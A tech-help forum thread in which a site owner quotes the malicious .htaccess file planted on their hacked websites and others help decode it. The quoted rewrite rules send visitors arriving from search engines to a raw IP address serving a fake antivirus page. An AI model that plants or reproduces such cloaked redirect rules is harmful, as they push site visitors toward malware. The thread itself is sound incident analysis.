Click on "My Maps" instead of "Get Directions," then create and save a map, then save locations to it.
Buffistechnology 3: "Press Some Buttons, See What Happens."
Got a question about technology? Ask it here. Discussion of hardware, software, TiVos, multi-region DVDs, Windows, Macs, LINUX, hand-helds, iPods, anything tech related. Better than any helpdesk!
Thanks!
On my new MacBook Pro, I can't get audio on the headphone jack. I go to System Preferences -> Sound -> Output, and it only lists the internal speakers, and not the headphones.
I feel stupid. What obvious thing am I missing?
[EDIT: I just wasn't pushing the headphone jack in far enough. I feel even more stupid now]
My websites were hacked. .htaccess files were added that read:
RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* ht tp://89.28.13.202/in.html?s=ix [R,L]
The way I discovered this is that certain form POST operations would be redirected to a fake antivirus website. I've removed the .htaccess files and changed my passwords, but I've got a couple questions:
1) Could someone have hacked in without the password? I'm pretty sure the permissions were set to 644. Seems like if they had the password, way more damage would have been done.
2) What are the redirects doing? The last one is the IP address of the fake antivirus site, but what's with all the lines before that? And what do the letters in square brackets mean?
t edit I put a space in the http of the last line to prevent the buffista autolinkafication
OK, did a little research and I *think* it's checking to see if the referring URL is from any of those six websites. If it is, it redirects to 89.28.13.202.
So why would it redirect users after certain POSTing of forms?
OK, did a little research and I *think* it's checking to see if the referring URL is from any of those six websites. If it is, it redirects to 89.28.13.202.
I was just doing the same research (I don't speak mod_rewrite fluently) and came to the same conclusion.
Dunno about the POST issue, though.
It's a good thing it *did* redirect after those POSTS, or I might not have noticed for a good while!
Got it! The referring URL has a parameter task=whatever, e.g. ht tp://mysite.com?task=edit
The condition in the fifth line is matching "ask".
Still need to figure out how they hacked the .htaccess files, but at least the smaller mystery is solved.
The answer is probably on your access_log, Jon.